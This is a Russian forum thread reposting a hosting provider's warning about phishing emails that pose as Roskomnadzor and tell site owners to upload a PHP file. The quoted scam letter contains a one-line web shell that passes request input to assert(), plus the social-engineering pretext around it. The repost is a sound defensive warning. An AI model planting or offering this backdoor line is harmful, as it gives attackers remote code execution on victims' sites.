От хостера прилетело предупреждение. Осторожнее!

[LowTech]

Письмо от Бегета с предупреждением.

 

Добрый день, ***********

Сегодня участились случаи взлома сайтов пользователей.

На контактный email домена приходят сообщения под видом письма от Роскомнадзора с просьбой разместить у себя файл reestr/reestr-id128032.php, содержащий в себе вредоносный код.

После размещения данного файла злоумышленники могут получить доступ к данным Вашего сайта.

Содержание мошеннического письма (вместо многоточия в тексте письма имя Вашего домена):

" Вы получили данное уведомление от Федеральной службы по надзору в сфере связи,
информационных технологий и массовых коммуникаций (Роскомнадзор) так как являетесь администратором
доменного имени … в сети «Интернет».
В соответствии с Федеральным законом от 5 мая 2014 года № 97-ФЗ "О внесении изменений в Федеральный закон "Об информации, информационных технологиях и о защите информации" и на основании решения суда (Новокуйбышевский городской суд Самарской области) от 11.08.2015 No 2­1618/2015, Ваш сайт … был внесен в реестр организаторов распространения информации в сети «Интернет» и сайтов и (или) страниц сайтов в сети «Интернет», на которых размещается общедоступная информация и доступ к которым в течении суток составляет более трех тысяч пользователей сети «Интернет».

Для идентификации Вас, как администратора доменного имени … , Вам необходимо:
1. Cоздать в корневой директории Вашего сайта папку reestr
2. Cоздать в данной папке файл reestr-id128032.php, содержащий следующий текст:
< ?php
assert(stripslashes($_REQUEST[roskomnadzor]));
?>
*В < ?php необходимо убрать пробел между < и ?php
Путь до файла на Вашем сайте должен получиться следующий: …/reestr/reestr-id128032.php

Если в течении 72 часов с момента получения данного письма Вы не идентифицируете себя, как администратор доменного имени ..., следую инструкции указанной выше, то Ваш сайт … будет внесен в чёрные списки интернет-провайдеров и заблокирован на территории Российской Федерации "

Просьба игнорировать подобное письмо, а если Вы уже разместили данный файл, то незамедлительно удалите его.

Если требуется помощь в поиске вредоносных файлов или необходимы логи запросов к сайту, Вы всегда можете

[freelancer]

а у вас нет этого файла?)

[chukcha]

http://habrahabr.ru/post/265515/

[LowTech]

а у вас нет этого файла?)

Только что сделал, надеюсь не прикроют теперь :)

[kilaker]

Это они что шелл присылают?